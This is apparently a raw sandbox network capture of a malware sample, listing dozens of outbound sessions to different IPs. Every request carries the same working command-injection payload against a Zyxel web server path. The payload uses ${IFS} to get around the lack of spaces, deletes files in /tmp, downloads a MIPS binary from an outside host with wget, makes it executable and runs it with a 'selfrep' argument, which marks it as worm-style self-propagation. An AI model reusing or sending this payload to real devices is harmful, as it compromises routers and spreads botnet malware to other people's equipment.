                                    Jan 13, 2024 19:02:46.458689928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7385192.168.2.135177687.226.107.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458710909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7386192.168.2.133603890.83.96.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458760023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7387192.168.2.1346092130.175.36.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458791018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7388192.168.2.1344084174.63.207.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458801031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7389192.168.2.1339064146.65.113.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458849907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7390192.168.2.134442444.188.152.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458868980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7391192.168.2.1357828185.186.125.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458933115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7392192.168.2.1360248119.138.28.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.458965063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7393192.168.2.135426296.50.144.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459016085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7394192.168.2.1335112105.38.247.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459058046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7395192.168.2.1337000220.72.64.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459065914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7396192.168.2.1353936179.76.170.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459125042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7397192.168.2.134299257.242.122.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459144115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7398192.168.2.133680866.115.46.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459194899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7399192.168.2.1352364124.88.150.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459239960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7400192.168.2.1356442102.4.234.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459266901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7401192.168.2.134634049.78.90.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459314108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7402192.168.2.1340904100.40.3.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459345102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7403192.168.2.1351602153.122.148.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459388971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7404192.168.2.134703447.23.9.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459419966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7405192.168.2.1334596153.172.183.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459450960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7406192.168.2.136058857.108.44.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459474087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7407192.168.2.1346318138.99.48.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459530115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7408192.168.2.1339076176.83.235.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459568977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7409192.168.2.1337462112.214.220.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459580898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7410192.168.2.1337648175.207.85.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459625006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7411192.168.2.1335978133.125.31.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459652901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7412192.168.2.1357298175.95.67.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459675074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7413192.168.2.1351198179.102.110.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459724903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7414192.168.2.1333440103.207.44.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459774017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7415192.168.2.1356482217.2.168.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459805965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7416192.168.2.133555459.31.121.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459831953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7417192.168.2.1357208163.78.251.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459909916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7418192.168.2.1335482129.140.164.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459954023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7419192.168.2.1345498204.22.114.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.459980011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7420192.168.2.1344062105.246.95.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460024118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7421192.168.2.1336360220.61.30.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460069895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7422192.168.2.1345250154.164.31.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460120916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7423192.168.2.134088463.54.115.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460149050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7424192.168.2.136024278.28.94.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460170984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7425192.168.2.1334534212.165.242.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460226059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7426192.168.2.134586413.126.27.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460287094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7427192.168.2.1355856114.24.36.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460340023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7428192.168.2.133761852.88.212.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460371971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7429192.168.2.1348178201.108.86.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460393906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7430192.168.2.1335248107.14.86.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460450888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7431192.168.2.1359562154.130.134.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460474968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7432192.168.2.1344330171.85.17.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460540056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7433192.168.2.1350268168.150.69.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460585117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7434192.168.2.133484094.52.58.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460633039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7435192.168.2.1342162207.177.174.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460644007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7436192.168.2.1335484101.196.233.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460688114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7437192.168.2.134958475.56.219.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460716963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7438192.168.2.1359256158.229.45.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460764885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7439192.168.2.135500286.226.238.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460786104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7440192.168.2.134199485.191.86.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460804939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7441192.168.2.1349782152.63.34.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460855007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7442192.168.2.1354014151.125.71.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460896015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7443192.168.2.1356526150.40.75.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460949898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7444192.168.2.135935297.109.218.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.460969925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7445192.168.2.135531479.194.90.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461036921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7446192.168.2.134710261.7.169.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.461055994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7447192.168.2.1339650140.21.207.143443
                                    TimestampBytes transferredDirectionData
